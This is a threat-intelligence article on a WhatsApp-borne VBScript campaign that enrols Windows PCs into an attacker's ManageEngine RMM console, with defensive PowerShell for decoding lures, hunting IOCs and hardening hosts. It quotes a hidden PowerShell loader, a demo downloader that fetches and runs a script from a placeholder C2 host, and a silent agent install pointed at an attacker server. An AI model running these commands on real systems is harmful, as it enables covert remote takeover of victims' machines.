Security researchers have uncovered an active malware campaign that hijacks legitimate WhatsApp accounts to deliver malicious VBScript files, ultimately enrolling victim machines into a ManageEngine remote monitoring and management (RMM) infrastructure. The attack, observed in June 2025, targets users in at least six countries—Malaysia, Brazil, India, Mexico, Singapore, and the United States—and gives threat actors persistent, stealthy access to Windows systems for data theft, lateral movement, or ransomware deployment.
Unlike traditional phishing campaigns that rely on email, this operation weaponizes the trust inherent in instant messaging. A compromised WhatsApp account sends a VBScript attachment disguised as a routine document, invoice, or notification. Because the message appears to come from a known contact, recipients are far more likely to run the script without suspicion. Once executed, the VBScript triggers a chain of commands that quietly downloads and installs a legitimate ManageEngine RMM agent, configuring it to phone home to attacker-controlled servers.
How the Attack Chain Unfolds
The initial infection vector is a .vbs file attached to a WhatsApp message. VBScript, a scripting language tightly integrated with Windows Script Host, remains a potent tool for automation, and for malware authors. Although Microsoft has deprecated it (on Windows 11 24H2 it ships as an optional Feature on Demand) and PowerShell has largely replaced it in modern attack chains, VBScript still executes natively through wscript.exe and cscript.exe on every currently supported Windows edition, and a script delivered through a messaging client never passes through the attachment filters that mail gateways and browser download protection apply. In this campaign, the script uses native Windows utilities such as PowerShell, mshta, or bitsadmin to retrieve a second-stage payload from a remote command-and-control (C2) server.
That second stage is a silent installer for ManageEngine Desktop Central or Endpoint Central—legitimate enterprise software used by IT teams worldwide. The installer is configured during execution to register the newly deployed agent with a rogue management server operated by the attackers. As a result, the victim’s PC becomes a managed endpoint in the criminal’s own RMM console, granting capabilities such as:
- Remote desktop access and screen capture
- File transfer and execution of arbitrary commands
- System information gathering (hardware, software, network)
- Deployment of additional malware or scripts
- Full persistence through the RMM agent’s built-in service
Because the ManageEngine agent is code-signed by Zoho Corp and widely deployed in enterprises, antivirus and reputation-based engines treat it as trusted software and the agent raises few alarms. This "living-off-the-land" approach allows attackers to blend into normal IT operations, evading detection for extended periods.
A Truly International Threat
The campaign’s geographic fingerprint is broad. According to telemetry shared by researchers, the following countries have been actively targeted:
| Country | Targeted Sector/Users |
|---|---|
| Malaysia | Small businesses, government contractors |
| Brazil | Healthcare, education, individual consumers |
| India | IT services, outsourced customer support |
| Mexico | Manufacturing, logistics |
| Singapore | Financial services, law firms |
| United States | Enterprise users, critical infrastructure |
Malaysian victims appear to bear the brunt of the attack, with a high volume of compromised WhatsApp accounts used to spread the lure. In Brazil and India, the malware has been observed alongside follow-on banking trojans, suggesting a monetization focus. In the U.S. and Singapore, initial intrusions have been linked to reconnaissance activity indicative of future ransomware or data exfiltration operations.
Why Abusing RMM Tools Is on the Rise
RMM abuse is not new—threat actors have long co-opted tools like AnyDesk, TeamViewer, and ScreenConnect. However, targeting ManageEngine specifically is a calculated choice. Its agents are enterprise-grade, support complex orchestration (patch management, software deployment, remote PowerShell), and generate legitimate-looking traffic to well-known domains. Security teams may overlook agent-related logs amid the noise of corporate IT activity.
This campaign also highlights a disturbing trend: the commoditization of RMM-based attack frameworks. Underground forums now sell ready-made “RMM implant” kits that allow even low-skilled criminals to set up their own malicious management servers. Combined with low-cost access to compromised WhatsApp accounts, the barrier to entry has never been lower.
The WhatsApp Vector: Trust Turned Toxic
WhatsApp’s end-to-end encryption and private messaging model make it a fertile ground for social engineering. Attackers either take over existing accounts through SIM swapping or credential theft, or they create duplicate profiles using publicly available photos. Once in control, they message the victim’s contacts with a convincing pretext—“Please review this invoice,” “Your report is attached,” or “I need your approval on this.” The attachment, typically named something like Invoice_2343.vbs, appears as a document on mobile devices but executes immediately on Windows when double-clicked.
Even the file extension can be masked. Windows File Explorer hides known extensions by default, so a file named Invoice_2343.vbs shows only as Invoice_2343 with a script icon, and a double extension such as Invoice_2343.pdf.vbs shows as Invoice_2343.pdf. Coupled with the trustworthiness of the sender, the success rate of these lures is alarmingly high.
Technical Deep Dive: From VBScript to RMM
Stage 1: The VBScript Payload
A typical VBScript in this campaign is heavily obfuscated. It creates a WScript.Shell object and calls its Run method with a window style of 0 (hidden), concatenating strings at runtime to build the PowerShell command line. The script may use StrReverse() and Chr() to keep the words "powershell" and "EncodedCommand" out of the file as plain text and so avoid static signatures. Stripped of the obfuscation, the loader reduces to:

```vbscript
' Stage 1 loader as reconstructed from the campaign; [Base64String] stands for the
' real encoded payload, which is omitted here.
Dim objShell
Set objShell = CreateObject("WScript.Shell")
' Second argument 0 = hidden window; -WindowStyle Hidden additionally hides the PowerShell console
objShell.Run "powershell -WindowStyle Hidden -EncodedCommand [Base64String]", 0
```

The encoded PowerShell downloads a second VBScript or an EXE installer from a C2 domain. Nothing appears on screen because the Run call's window-style argument of 0 hides the launched window and -WindowStyle Hidden hides the PowerShell console itself. Note that -EncodedCommand takes base64 over the UTF-16LE bytes of the script, which is why a naive UTF-8 base64 decode of the argument yields garbage.
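For an analyst who has the .vbs or a process-creation log line in hand, the two tasks are undoing the string tricks and decoding the -EncodedCommand argument. The following PowerShell is an added example written for this article, not code from the campaign or from any vendor: Expand-VbsString resolves Chr()/StrReverse()/& concatenation into a plain literal, and Expand-EncodedCommand extracts and decodes the base64 argument (UTF-16LE, as PowerShell expects). The lure line and the Stage 2 command it carries are constructed for the demonstration; the C2 hostname is a placeholder.

```powershell
# Added example (not from the original article): static triage helpers for a Stage 1 lure.
# All sample inputs below are constructed for illustration.

function Expand-EncodedCommand {
    param([Parameter(Mandatory)][string]$CommandLine)
    # Accept the common abbreviations: -e, -ec, -enc, -EncodedCommand (case-insensitive).
    $m = [regex]::Match($CommandLine, '(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)')
    if (-not $m.Success) { return $null }
    # -EncodedCommand is base64 over UTF-16LE, so decode with the Unicode encoding, not UTF-8.
    $bytes = [Convert]::FromBase64String($m.Groups[1].Value)
    return [Text.Encoding]::Unicode.GetString($bytes)
}

function Expand-VbsString {
    param([Parameter(Mandatory)][string]$Expression)
    $s = $Expression
    # 1. Chr(n) -> quoted literal (a literal double quote is doubled inside VBScript strings)
    $s = [regex]::Replace($s, 'Chr\(\s*(\d+)\s*\)', {
        param($m)
        $c = [string][char][int]$m.Groups[1].Value
        if ($c -eq '"') { $c = '""' }
        '"' + $c + '"'
    })
    # 2. StrReverse("...") -> the reversed literal
    $s = [regex]::Replace($s, '(?i)StrReverse\(\s*"((?:[^"]|"")*)"\s*\)', {
        param($m)
        $chars = $m.Groups[1].Value.ToCharArray()
        [array]::Reverse($chars)
        '"' + (-join $chars) + '"'
    })
    # 3. Fold "a" & "b" into "ab" until nothing changes
    do {
        $before = $s
        $s = [regex]::Replace($s, '"((?:[^"]|"")*)"\s*&\s*"((?:[^"]|"")*)"', {
            param($m) '"' + $m.Groups[1].Value + $m.Groups[2].Value + '"'
        })
    } while ($s -ne $before)
    # 4. If a single literal remains, strip the outer quotes and un-double embedded quotes
    if ($s -match '^\s*"((?:[^"]|"")*)"\s*$') { return $Matches[1] -replace '""', '"' }
    return $s   # still contains variables or calls this helper does not model
}

# --- Demonstration on constructed input ---
# Build a small encoded Stage 2 the way a lure author would (single quotes keep $env literal).
$stage2 = 'iwr http://c2.example.invalid/a.vbs -OutFile $env:TEMP\4821.vbs; wscript $env:TEMP\4821.vbs'
$b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($stage2))

# A Stage 1 expression as it might appear in the .vbs, with "powershell" hidden by StrReverse.
$vbsExpr = 'StrReverse("llehsrewop") & Chr(32) & "-W" & "indowStyle Hidden " & "-EncodedCommand " & "' + $b64 + '"'

$cmd = Expand-VbsString $vbsExpr
$cmd                          # powershell -WindowStyle Hidden -EncodedCommand JAB...
Expand-EncodedCommand $cmd    # the decoded Stage 2 downloader (equals $stage2)
```

The same Expand-EncodedCommand works on the CommandLine field of a Sysmon event 1 or Security 4688 record, which is where this stage is usually first seen; Expand-VbsString is deliberately limited to the three tricks the article names and returns the expression unchanged when it meets something else, so a partial result is a signal to open the script by hand rather than a silent miss.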
Stage 2: Retrieving the ManageEngine Installer
The downloaded installer is a legitimate MSI or EXE file signed by Zoho Corp. The script invokes msiexec /i or runs the executable with parameters that specify the C2 server address, group name, and activation key. The shape of the command is:

```cmd
msiexec /i ManageEngine_Agent.msi /qn SERVER=malicious-c2.com:8443 GROUP=default KEY=attackerkEy123
```

The property names in this example (SERVER, GROUP, KEY) are illustrative; the exact enrollment parameters depend on the agent build and how it is packaged. The /qn flag ensures a fully silent installation. Once installed, the agent service starts, establishes an outbound connection to the attacker's server, and appears in the criminal's management console. The point to hold onto is the pattern: a silent install of a trusted, signed agent pointed at a management server the victim never chose.
Stage 3: Establishing Persistence and Control
The agent registers itself as a Windows service, often named "ManageEngine Desktop Central Agent," and adds startup entries. It also opens a persistent HTTPS connection, enabling the attacker to send commands at any time. Because the traffic is TLS on standard ports, packet contents reveal nothing; network detection has to rest on the destination instead, that is, on the server name in the TLS handshake (SNI), the server certificate, or the remote IP not matching the organization's sanctioned management server.
Indicators of Compromise (IOCs)
While the campaign uses rotating C2 domains, some common IOCs include:
- Presence of an unexpected ManageEngine agent service (check services.msc)
- Scheduled tasks named "DCAgentUpdater" or similar
- Outbound connections to unfamiliar IPs on port 8443 or 443
- New firewall exceptions for the agent process
- VBScript files in %TEMP% or download folders with random numeric names
Organizations using ManageEngine legitimately should verify that all agents are registered to their authorized management servers. Any rogue agents should be immediately uninstalled and investigated.
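The indicators above translate directly into a per-host hunt. The following PowerShell is an added example written for this article, not a vendor tool: it walks services, scheduled tasks, established connections, firewall rules and script files on the local machine and returns one record per hit. The name pattern and the -SanctionedServer parameter are this example's assumptions; organizations that run ManageEngine legitimately pass their own management server hostnames or IPs so that agents talking to those servers are not reported.

```powershell
# Added example (not from the original article): hunt for the listed IOCs on one Windows host.
# Run elevated so that service paths, all connections and every user's folders are visible.
function Find-RogueRmmAgent {
    [CmdletBinding()]
    param(
        # Hostnames or IPs of management servers your organization actually operates (assumption).
        [string[]]$SanctionedServer = @(),
        # Name pattern for the agent and its artefacts (assumption; extend to other RMM suites).
        [string]$Pattern = 'ManageEngine|Desktop ?Central|Endpoint ?Central|DCAgent'
    )
    $findings = [System.Collections.Generic.List[object]]::new()
    function Add-Finding([string]$Category, [string]$Detail) {
        $findings.Add([pscustomobject]@{ Category = $Category; Detail = $Detail })
    }

    # Resolve sanctioned hostnames once so connections can be compared by IP.
    $sanctionedIps = foreach ($s in $SanctionedServer) {
        $ip = $null
        if ([ipaddress]::TryParse($s, [ref]$ip)) { $s }
        else { try { [Net.Dns]::GetHostAddresses($s).IPAddressToString } catch { } }
    }

    # 1. Services: match on name, display name or binary path
    Get-CimInstance Win32_Service | Where-Object {
        ($_.Name, $_.DisplayName, $_.PathName -join ' ') -match $Pattern
    } | ForEach-Object { Add-Finding 'Service' "$($_.Name) [$($_.State)] $($_.PathName)" }

    # 2. Scheduled tasks: task name or the executable of any action
    Get-ScheduledTask | Where-Object {
        ($_.TaskName + ' ' + (($_.Actions | ForEach-Object Execute) -join ' ')) -match $Pattern
    } | ForEach-Object { Add-Finding 'ScheduledTask' "$($_.TaskPath)$($_.TaskName)" }

    # 3. Established connections on 443/8443 from a matching process to an unsanctioned host
    Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue |
        Where-Object { $_.RemotePort -in 443, 8443 } | ForEach-Object {
            $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
            if ($proc -and $proc.Path -match $Pattern -and $_.RemoteAddress -notin $sanctionedIps) {
                Add-Finding 'NetworkConnection' "$($proc.Path) -> $($_.RemoteAddress):$($_.RemotePort)"
            }
        }

    # 4. Firewall rules whose program path matches
    Get-NetFirewallApplicationFilter -ErrorAction SilentlyContinue |
        Where-Object { $_.Program -match $Pattern } | Get-NetFirewallRule |
        ForEach-Object { Add-Finding 'FirewallRule' "$($_.DisplayName) ($($_.Direction)/$($_.Action))" }

    # 5. Script files with numeric names, or with a document-looking double extension,
    #    in %TEMP% and each user's Downloads folder
    $dirs = @($env:TEMP) + (Get-ChildItem 'C:\Users' -Directory -ErrorAction SilentlyContinue |
        ForEach-Object { Join-Path $_.FullName 'Downloads' })
    Get-ChildItem -Path $dirs -Include *.vbs, *.vbe, *.js, *.jse -Recurse -Depth 2 -ErrorAction SilentlyContinue |
        Where-Object { $_.BaseName -match '^\d+$' -or $_.Name -match '\.(pdf|docx?|xlsx?)\.(vbs|vbe|js|jse)$' } |
        ForEach-Object { Add-Finding 'ScriptFile' "$($_.FullName) ($($_.LastWriteTime))" }

    return $findings
}

# Usage: the hostname below is a placeholder for your own management server.
Find-RogueRmmAgent -SanctionedServer 'uem.corp.example' | Format-Table -AutoSize
```

An empty result does not prove a clean host (the attacker can rename the service), but a non-empty one on a machine that was never enrolled in ManageEngine is a strong signal. The same function is a reasonable starting point for an EDR custom query or a scheduled compliance check across a fleet; in that case compare the ServerName the agent was installed with against the sanctioned list rather than relying only on live connections.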
Attackers’ Endgame: What Happens After the RMM Agent Is Deployed
Once the attacker gains interactive remote access, the possibilities are vast. Based on similar RMM-based campaigns, the post-intrusion activity typically includes:
- Credential Harvesting: The agent can run Mimikatz or similar tools to extract cached passwords, Kerberos tickets, and browser-stored credentials.
- Lateral Movement: With stolen credentials, the attacker pivots to other systems via RDP, PsExec, or WMI.
- Data Exfiltration: Sensitive files are zipped and transferred through the agent’s secure channel or via cloud storage (Dropbox, Mega).
- Ransomware Deployment: The final payload may be a ransomware binary pushed through the RMM’s software deployment module.
- Persistence Beyond the Agent: Attackers often install secondary backdoors separate from the RMM tool to maintain access even if the agent is removed.
In some cases, the compromised RMM agent itself is used to deploy additional malware to hundreds of endpoints in a single command, effectively weaponizing the victim’s own IT management infrastructure.
Defensive Strategies: Mitigating VBScript and RMM Threats
For Individual Users
- Disable Windows Script Host if not needed. This can be done via Group Policy, via the Enabled value under HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings, or by simply pointing the .vbs file association at Notepad. On Windows 11 24H2 and later, VBScript is an optional Feature on Demand and can be uninstalled outright if nothing on the machine depends on it.
- Never open attachments from unknown or even known contacts without verification. Contact the sender through a different channel if an attachment seems out of the ordinary.
- Enable file extension visibility in File Explorer to easily spot .vbs files and double extensions.
- Use a reputable security solution that includes behavioral detection for script-based attacks.
- Consider using WhatsApp's built-in preview feature: legitimate documents like PDFs will preview, while script files will not, potentially raising suspicion.
For Businesses and IT Administrators
- Deploy application control (AppLocker script rules or Windows Defender Application Control) to block .vbs, .js and other script files from running out of user-writable directories such as %TEMP% and Downloads, or to block wscript.exe and cscript.exe outright for users who have no need for them.
- Monitor for unsanctioned RMM installations. Endpoint detection and response (EDR) tools can flag the installation of new services or modules associated with ManageEngine or other RMM suites.
- Enable attack surface reduction (ASR) rules in Microsoft Defender. The rules that bear directly on this chain are "Block JavaScript or VBScript from launching downloaded executable content" and "Block execution of potentially obfuscated scripts"; "Block executable files from running unless they meet a prevalence, age, or trusted list criterion" adds a further barrier against the second-stage installer, although a signed, widely deployed agent may pass its reputation test.
- Educate employees about the evolving threat of WhatsApp and instant-messaging malware, not just email phishing.
- Audit your own RMM deployments regularly. Ensure that every agent corresponds to an authorized server and that auto-enrollment features are restricted to known networks.
- Implement network segmentation so that if an endpoint is compromised via WhatsApp, the attacker cannot immediately reach critical servers.
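The host-side controls from the individual and administrator lists above can be applied and verified with a few lines of PowerShell. The following is an added example written for this article, not Microsoft or Zoho guidance: it disables Windows Script Host through the registry, repoints the script ProgIDs at Notepad so a double-click no longer executes anything, and turns on the three ASR rules discussed above. The ASR GUIDs are Microsoft's published identifiers; the AuditMode default and the function names are this example's choices.

```powershell
# Added example (not from the original article): host hardening against .vbs lures.
# Run elevated. Each function is idempotent; Test-ScriptHardening reports the resulting state.

# 1. Disable Windows Script Host machine-wide and for the current user
#    (wscript.exe and cscript.exe then refuse to run any script).
function Disable-WindowsScriptHost {
    foreach ($hive in 'HKLM:', 'HKCU:') {
        $key = "$hive\SOFTWARE\Microsoft\Windows Script Host\Settings"
        New-Item -Path $key -Force | Out-Null
        New-ItemProperty -Path $key -Name Enabled -Value 0 -PropertyType DWord -Force | Out-Null
    }
}

# 2. Make double-click open script files in Notepad instead of executing them.
#    Administrators who still need a script run it explicitly with cscript.exe.
function Set-ScriptOpensInNotepad {
    foreach ($progId in 'VBSFile', 'VBEFile', 'JSFile', 'JSEFile', 'WSFFile') {
        $key = "HKLM:\SOFTWARE\Classes\$progId\Shell\Open\Command"
        New-Item -Path $key -Force | Out-Null
        Set-ItemProperty -Path $key -Name '(default)' -Value 'notepad.exe "%1"'
    }
}

# 3. Defender ASR rules aimed at script lures (GUIDs as published by Microsoft).
$ScriptAsrRules = @{
    'D3E037E1-3EB8-44C8-A917-57927947596D' = 'Block JavaScript or VBScript from launching downloaded executable content'
    '5BEB7EFE-FD9A-4556-801D-275E5FFC04CC' = 'Block execution of potentially obfuscated scripts'
    '01443614-CD74-433A-B99E-2ECDC07BFC25' = 'Block executable files unless they meet a prevalence, age, or trusted list criterion'
}
function Enable-ScriptAsrRules {
    # AuditMode first: review the ASR events (Defender operational log, event 1122) before blocking.
    param([ValidateSet('AuditMode', 'Enabled')][string]$Mode = 'AuditMode')
    foreach ($id in $ScriptAsrRules.Keys) {
        Add-MpPreference -AttackSurfaceReductionRules_Ids $id -AttackSurfaceReductionRules_Actions $Mode
    }
}

# 4. Report the state of all three controls.
function Test-ScriptHardening {
    $wsh = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name Enabled -ErrorAction SilentlyContinue
    $vbs = (Get-ItemProperty 'HKLM:\SOFTWARE\Classes\VBSFile\Shell\Open\Command' -ErrorAction SilentlyContinue).'(default)'
    $pref = Get-MpPreference
    # Actions are index-aligned with Ids: 0 = Disabled, 1 = Block, 2 = Audit, 6 = Warn
    $asr = for ($i = 0; $i -lt $pref.AttackSurfaceReductionRules_Ids.Count; $i++) {
        '{0}={1}' -f $pref.AttackSurfaceReductionRules_Ids[$i], $pref.AttackSurfaceReductionRules_Actions[$i]
    }
    [pscustomobject]@{
        WshDisabled       = ($wsh.Enabled -eq 0)
        VbsOpensInNotepad = ($vbs -like 'notepad.exe*')
        AsrRules          = ($asr -join '; ')
    }
}

Disable-WindowsScriptHost
Set-ScriptOpensInNotepad
Enable-ScriptAsrRules -Mode AuditMode
Test-ScriptHardening
```

Disabling WSH and repointing the ProgIDs overlap; keeping both means a later Group Policy refresh that re-enables WSH still leaves double-click harmless. None of this stops an attacker who already has an agent enrolled, which is why the RMM audit in the list above stays necessary alongside the script controls.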
What WhatsApp Can Do
Because WhatsApp is end-to-end encrypted, Meta cannot inspect attachment contents on its servers, so any additional check would have to run in the client: for example, flagging or blocking files with script extensions or double extensions before they are saved or opened, in the same way the app already warns about "suspicious links." Making it easier to report compromised accounts would also help deter account takeovers.
The Bigger Picture: Instant Messaging as an Attack Surface
Instant messaging platforms have become an irresistible target for cybercriminals. WhatsApp’s two-billion-strong user base means a well-crafted message can reach more potential victims than a typical email spam campaign. Moreover, because people use WhatsApp for both personal and professional communication, the boundaries blur—employees may receive a work-related lure on their personal devices, leading to an infection that later spreads to corporate networks.
This campaign underscores the need for security awareness that stretches beyond the email inbox. Employees should be trained to treat attachments from colleagues and business partners with the same scrutiny regardless of the delivery medium. As RMM-based attacks grow more common, the security community must shift its focus to detecting unauthorized management tools as critical IOCs, not just the presence of known malware binaries.
What Comes Next?
Intelligence suggests that the threat actors behind this campaign are refining their tooling—moving from VBScript to PowerShell and incorporating more advanced obfuscation to evade Microsoft’s Antimalware Scan Interface (AMSI). There are early indicators that a variant of the attack is being tested on other instant messengers, including Telegram and Signal, using their file-sharing capabilities.
Microsoft has already announced a phased retirement of VBScript: it became an optional Feature on Demand in Windows 11 24H2, is scheduled to be disabled by default in a later release (around 2027), and is to be removed from Windows entirely after that. Until then, defensive measures must focus on the human element and on monitoring for, and blocking, unwanted RMM agent deployments. The line between a helpful IT tool and a malicious remote access trojan has never been thinner.